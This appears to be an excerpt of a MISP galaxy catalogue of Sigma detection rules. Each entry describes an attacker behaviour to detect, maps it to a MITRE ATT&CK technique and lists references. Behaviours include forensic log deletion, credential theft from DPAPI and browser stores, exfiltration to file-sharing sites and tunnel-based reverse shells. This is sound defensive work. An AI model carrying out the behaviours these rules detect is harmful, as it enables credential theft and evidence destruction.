Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence

The tag is: misp-galaxy:sigma-rules="TeamViewer Log File Deleted"

TeamViewer Log File Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 10026. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_teamviewer_logs.yml

Potential PrintNightmare Exploitation Attempt

Detects DLL deletions from the Spooler Service driver folder, which might indicate a potential exploitation attempt of CVE-2021-1675.

The tag is: misp-galaxy:sigma-rules="Potential PrintNightmare Exploitation Attempt"

Potential PrintNightmare Exploitation Attempt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"

Table 10027. Table References

Links

https://github.com/hhlxf/PrintNightmare

https://github.com/cube0x0/CVE-2021-1675

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_cve_2021_1675_print_nightmare.yml

Exchange PowerShell Cmdlet History Deleted

Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence

The tag is: misp-galaxy:sigma-rules="Exchange PowerShell Cmdlet History Deleted"

Exchange PowerShell Cmdlet History Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

Table 10028. Table References

Links

https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_exchange_powershell_logs.yml

Backup Files Deleted

Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.

The tag is: misp-galaxy:sigma-rules="Backup Files Deleted"

Backup Files Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 10029. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-6---windows---delete-backup-files

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_backup_file.yml

EventLog EVTX File Deleted

Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence

The tag is: misp-galaxy:sigma-rules="EventLog EVTX File Deleted"

EventLog EVTX File Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

Table 10030. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_event_log_files.yml

File Deleted Via Sysinternals SDelete

Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.

The tag is: misp-galaxy:sigma-rules="File Deleted Via Sysinternals SDelete"

File Deleted Via Sysinternals SDelete has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 10031. Table References

Links

https://github.com/OTRF/detection-hackathon-apt29/issues/9

https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml

Tomcat WebServer Logs Deleted

Detects the deletion of Tomcat WebServer logs which may indicate an attempt to destroy forensic evidence

The tag is: misp-galaxy:sigma-rules="Tomcat WebServer Logs Deleted"

Tomcat WebServer Logs Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

Table 10032. Table References

Links

Internal Research

https://linuxhint.com/view-tomcat-logs-windows/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_tomcat_logs.yml

Prefetch File Deleted

Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence

The tag is: misp-galaxy:sigma-rules="Prefetch File Deleted"

Prefetch File Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 10033. Table References

Links

Internal Research

https://www.group-ib.com/blog/hunting-for-ttps-with-prefetch-files/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_prefetch.yml

PowerShell Console History Logs Deleted

Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence

The tag is: misp-galaxy:sigma-rules="PowerShell Console History Logs Deleted"

PowerShell Console History Logs Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

Table 10034. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_powershell_command_history.yml

ADS Zone.Identifier Deleted By Uncommon Application

Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that rely on the ADS, such as those enforced by Microsoft Office apps.

The tag is: misp-galaxy:sigma-rules="ADS Zone.Identifier Deleted By Uncommon Application"

ADS Zone.Identifier Deleted By Uncommon Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 10035. Table References

Links

https://securityliterate.com/how-malware-abuses-the-zone-identifier-to-circumvent-detection-and-analysis/

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_zone_identifier_ads_uncommon.yml

Unusual File Deletion by Dns.exe

Detects an unexpected file being deleted by dns.exe, which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)

The tag is: misp-galaxy:sigma-rules="Unusual File Deletion by Dns.exe"

Unusual File Deletion by Dns.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

Table 10036. Table References

Links

https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml

Access To Potentially Sensitive Sysvol Files By Uncommon Application

Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.

The tag is: misp-galaxy:sigma-rules="Access To Potentially Sensitive Sysvol Files By Uncommon Application"

Access To Potentially Sensitive Sysvol Files By Uncommon Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Group Policy Preferences - T1552.006" with estimative-language:likelihood-probability="almost-certain"

Table 10037. Table References

Links

https://github.com/vletoux/pingcastle

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_gpo_access_file.yml

Access To Browser Credential Files By Uncommon Application

Detects file access requests to browser credential stores by uncommon processes. Could indicate a potential credential-stealing attempt. Requires heavy baselining before use.

The tag is: misp-galaxy:sigma-rules="Access To Browser Credential Files By Uncommon Application"

Access To Browser Credential Files By Uncommon Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 10038. Table References

Links

https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users

https://github.com/lclevy/firepwd

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_browser_credential_access.yml

Access To Windows DPAPI Master Keys By Uncommon Application

Detects file access requests to the Windows Data Protection API master keys by an uncommon application. This can be a sign of credential stealing. An example case would be use of the mimikatz "dpapi::masterkey" function.

The tag is: misp-galaxy:sigma-rules="Access To Windows DPAPI Master Keys By Uncommon Application"

Access To Windows DPAPI Master Keys By Uncommon Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004" with estimative-language:likelihood-probability="almost-certain"

Table 10039. Table References

Links

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords

http://blog.harmj0y.net/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml

Credential Manager Access By Uncommon Application

Detects suspicious processes, based on name and location, that access the Windows Credential Manager and vault, which can be a sign of credential stealing. An example case would be use of the mimikatz "dpapi::cred" function.

The tag is: misp-galaxy:sigma-rules="Credential Manager Access By Uncommon Application"

Credential Manager Access By Uncommon Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 10040. Table References

Links

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_credential_manager_access.yml

Access To Windows Credential History File By Uncommon Application

Detects file access requests to the Windows Credential History file by an uncommon application. This can be a sign of credential stealing. An example case would be use of the mimikatz "dpapi::credhist" function.

The tag is: misp-galaxy:sigma-rules="Access To Windows Credential History File By Uncommon Application"

Access To Windows Credential History File By Uncommon Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004" with estimative-language:likelihood-probability="almost-certain"

Table 10041. Table References

Links

https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist

https://www.passcape.com/windows_password_recovery_dpapi_credhist

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml

Access To .Reg/.Hive Files By Uncommon Application

Detects file access requests to files ending with either the ".hive" or ".reg" extension, usually associated with Windows Registry backups.

The tag is: misp-galaxy:sigma-rules="Access To .Reg/.Hive Files By Uncommon Application"

Access To .Reg/.Hive Files By Uncommon Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 10042. Table References

Links

https://github.com/tccontre/Reg-Restore-Persistence-Mole

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_reg_and_hive_access.yml

Unusual File Modification by dns.exe

Detects an unexpected file being modified by dns.exe, which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)

The tag is: misp-galaxy:sigma-rules="Unusual File Modification by dns.exe"

Unusual File Modification by dns.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

Table 10043. Table References

Links

https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml

File Creation Date Changed to Another Year

Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system. Note that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.

The tag is: misp-galaxy:sigma-rules="File Creation Date Changed to Another Year"

File Creation Date Changed to Another Year has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

Table 10044. Table References

Links

https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_2022_timestomping.yml

DNS Query To Remote Access Software Domain From Non-Browser App

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

The tag is: misp-galaxy:sigma-rules="DNS Query To Remote Access Software Domain From Non-Browser App"

DNS Query To Remote Access Software Domain From Non-Browser App has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10045. Table References

Links

https://redcanary.com/blog/misbehaving-rats/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows

https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_remote_access_software_domains_non_browsers.yml

DNS HybridConnectionManager Service Bus

Detects Azure Hybrid Connection Manager services querying the Azure service bus service

The tag is: misp-galaxy:sigma-rules="DNS HybridConnectionManager Service Bus"

DNS HybridConnectionManager Service Bus has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compromise Client Software Binary - T1554" with estimative-language:likelihood-probability="almost-certain"

Table 10046. Table References

Links

https://twitter.com/Cyb3rWard0g/status/1381642789369286662

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml

Suspicious DNS Query for IP Lookup Service APIs

Detects DNS queries for IP lookup services such as "api.ipify.org" originating from a non-browser process.

The tag is: misp-galaxy:sigma-rules="Suspicious DNS Query for IP Lookup Service APIs"

Suspicious DNS Query for IP Lookup Service APIs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Gather Victim Network Information - T1590" with estimative-language:likelihood-probability="almost-certain"

Table 10047. Table References

Links

https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html

https://twitter.com/neonprimetime/status/1436376497980428318

https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_external_ip_lookup.yml

DNS Query To Visual Studio Code Tunnels Domain

Detects DNS query requests to Visual Studio Code tunnel domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

The tag is: misp-galaxy:sigma-rules="DNS Query To Visual Studio Code Tunnels Domain"

DNS Query To Visual Studio Code Tunnels Domain has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 10048. Table References

Links

https://ipfyx.fr/post/visual-studio-code-tunnel/

https://badoption.eu/blog/2023/01/31/code_c2.html

https://cydefops.com/vscode-data-exfiltration

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_vscode_tunnel_communication.yml

DNS Query for Anonfiles.com Domain - Sysmon

Detects DNS queries for "anonfiles.com", which is an anonymous file upload platform often used for malicious purposes

The tag is: misp-galaxy:sigma-rules="DNS Query for Anonfiles.com Domain - Sysmon"

DNS Query for Anonfiles.com Domain - Sysmon has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"

Table 10049. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_anonymfiles_com.yml

DNS Server Discovery Via LDAP Query

Detects DNS server discovery via LDAP query requests from uncommon applications

The tag is: misp-galaxy:sigma-rules="DNS Server Discovery Via LDAP Query"

DNS Server Discovery Via LDAP Query has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

Table 10050. Table References

Links

https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/7fcdce70-5205-44d6-9c3a-260e616a2f04

https://github.com/redcanaryco/atomic-red-team/blob/980f3f83fd81f37c1ca9c02dccfd1c3d9f9d0841/atomics/T1016/T1016.md#atomic-test-9---dns-server-discovery-using-nslookup

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_dns_server_discovery_via_ldap_query.yml

TeamViewer Domain Query By Non-TeamViewer Application

Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn’t named TeamViewer (sometimes used by threat actors for obfuscation)

The tag is: misp-galaxy:sigma-rules="TeamViewer Domain Query By Non-TeamViewer Application"

TeamViewer Domain Query By Non-TeamViewer Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10051. Table References

Links

https://www.teamviewer.com/en-us/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_teamviewer_domain_query_by_uncommon_app.yml

DNS Query To MEGA Hosting Website

Detects DNS queries for subdomains related to the MEGA file-sharing website

The tag is: misp-galaxy:sigma-rules="DNS Query To MEGA Hosting Website"

DNS Query To MEGA Hosting Website has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"

Table 10052. Table References

Links

https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mega_nz.yml

DNS Query To Ufile.io

Detects DNS queries to "ufile.io", which has been seen abused by malware and threat actors as a method for data exfiltration

The tag is: misp-galaxy:sigma-rules="DNS Query To Ufile.io"

DNS Query To Ufile.io has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"

Table 10053. Table References

Links

https://thedfirreport.com/2021/12/13/diavol-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_ufile_io_query.yml

Suspicious Cobalt Strike DNS Beaconing - Sysmon

Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons

The tag is: misp-galaxy:sigma-rules="Suspicious Cobalt Strike DNS Beaconing - Sysmon"

Suspicious Cobalt Strike DNS Beaconing - Sysmon has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

Table 10054. Table References

Links

https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/

https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml

AppX Package Installation Attempts Via AppInstaller.EXE

Detects DNS queries made by "AppInstaller.EXE". The AppInstaller is the default handler for the "ms-appinstaller" URI. It attempts to load/install a package from the referenced URL.

The tag is: misp-galaxy:sigma-rules="AppX Package Installation Attempts Via AppInstaller.EXE"

AppX Package Installation Attempts Via AppInstaller.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10055. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/

https://twitter.com/notwhickey/status/1333900137232523264

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_appinstaller.yml

Cloudflared Tunnels Related DNS Requests

Detects DNS query requests to Cloudflared tunnels domains.

The tag is: misp-galaxy:sigma-rules="Cloudflared Tunnels Related DNS Requests"

Cloudflared Tunnels Related DNS Requests has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 10056. Table References

Links

Internal Research

https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_cloudflared_communication.yml

DNS Query Request By Regsvr32.EXE

Detects DNS queries initiated by "Regsvr32.exe"

The tag is: misp-galaxy:sigma-rules="DNS Query Request By Regsvr32.EXE"

DNS Query Request By Regsvr32.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model - T1559.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 10057. Table References

Links

https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_regsvr32_dns_query.yml

DNS Query Request To OneLaunch Update Service

Detects DNS query requests to "update.onelaunch.com". This domain is associated with the OneLaunch adware application. When the OneLaunch application is installed it will attempt to get updates from this domain.

The tag is: misp-galaxy:sigma-rules="DNS Query Request To OneLaunch Update Service"

DNS Query Request To OneLaunch Update Service has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Input Capture - T1056" with estimative-language:likelihood-probability="almost-certain"

Table 10058. Table References

Links

https://www.myantispyware.com/2020/12/14/how-to-uninstall-onelaunch-browser-removal-guide/

https://malware.guide/browser-hijacker/remove-onelaunch-virus/

https://www.malwarebytes.com/blog/detections/pup-optional-onelaunch-silentcf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_onelaunch_update_service.yml

DNS Query Tor .Onion Address - Sysmon

Detects DNS queries to an ".onion" address related to Tor routing networks

The tag is: misp-galaxy:sigma-rules="DNS Query Tor .Onion Address - Sysmon"

DNS Query Tor .Onion Address - Sysmon has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"

Table 10059. Table References

Links

https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_tor_onion_domain_query.yml

DNS Query To Devtunnels Domain

Detects DNS query requests to Devtunnels domains. Attackers can abuse this feature to establish a reverse shell or persistence on a machine.

The tag is: misp-galaxy:sigma-rules="DNS Query To Devtunnels Domain"

DNS Query To Devtunnels Domain has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 10060. Table References

Links

https://cydefops.com/devtunnels-unleashed

https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security

https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_devtunnels_communication.yml

New DLL Registered Via Odbcconf.EXE

Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs.

The tag is: misp-galaxy:sigma-rules="New DLL Registered Via Odbcconf.EXE"

New DLL Registered Via Odbcconf.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Odbcconf - T1218.008" with estimative-language:likelihood-probability="almost-certain"

Table 10061. Table References

Links

https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176

https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/

https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16

https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/

https://redcanary.com/blog/raspberry-robin/

https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml

Webshell Hacking Activity Patterns

Detects certain parent-child process patterns found in cases in which a web shell is used to perform credential dumping or exfiltration activities on a compromised system

The tag is: misp-galaxy:sigma-rules="Webshell Hacking Activity Patterns"

Webshell Hacking Activity Patterns has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

Table 10062. Table References

Links

https://youtu.be/7aemGhaE9ds?t=641

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_hacking.yml

PowerShell Execution With Potential Decryption Capabilities

Detects PowerShell commands that decrypt an ".LNK" file to drop the next stage of the malware.

The tag is: misp-galaxy:sigma-rules="PowerShell Execution With Potential Decryption Capabilities"

Table 10063. Table References

Links

https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_decrypt_pattern.yml

New Generic Credentials Added Via Cmdkey.EXE

Detects usage of cmdkey to add generic credentials. As an example, this has to be used before connecting to an RDP session via the command line interface.

The tag is: misp-galaxy:sigma-rules="New Generic Credentials Added Via Cmdkey.EXE"

New Generic Credentials Added Via Cmdkey.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"

Table 10064. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml

Add SafeBoot Keys Via Reg Utility

Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attackers to allow the ransomware to work in safe mode as some security products do not

The tag is: misp-galaxy:sigma-rules="Add SafeBoot Keys Via Reg Utility"

Add SafeBoot Keys Via Reg Utility has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10065. Table References

Links

https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml

Suspicious DLL Loaded via CertOC.EXE

Detects when a user installs certificates by using CertOC.exe to load the target DLL file.

The tag is: misp-galaxy:sigma-rules="Suspicious DLL Loaded via CertOC.EXE"

Suspicious DLL Loaded via CertOC.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10066. Table References

Links

https://twitter.com/sblmsrsn/status/1445758411803480072?s=20

https://lolbas-project.github.io/lolbas/Binaries/Certoc/

https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml

Suspicious Service DACL Modification Via Set-Service Cmdlet

Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (only available with PowerShell 7) that can be used to hide services or make them unstoppable

The tag is: misp-galaxy:sigma-rules="Suspicious Service DACL Modification Via Set-Service Cmdlet"

Suspicious Service DACL Modification Via Set-Service Cmdlet has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 10067. Table References

Links

https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings

https://www.sans.org/blog/red-team-tactics-hiding-windows-services/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml

Remote Access Tool - ScreenConnect Installation Execution

Detects ScreenConnect program starts that establish a remote access to a system.

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - ScreenConnect Installation Execution"

Remote Access Tool - ScreenConnect Installation Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

Table 10068. Table References

Links

https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_installation_cli_param.yml

CobaltStrike Load by Rundll32

Rundll32 can be used by Cobalt Strike with the StartW function to load DLLs from the command line.

The tag is: misp-galaxy:sigma-rules="CobaltStrike Load by Rundll32"

CobaltStrike Load by Rundll32 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10069. Table References

Links

https://redcanary.com/threat-detection-report/

https://www.cobaltstrike.com/help-windows-executable

https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml

Sysinternals PsSuspend Suspicious Execution

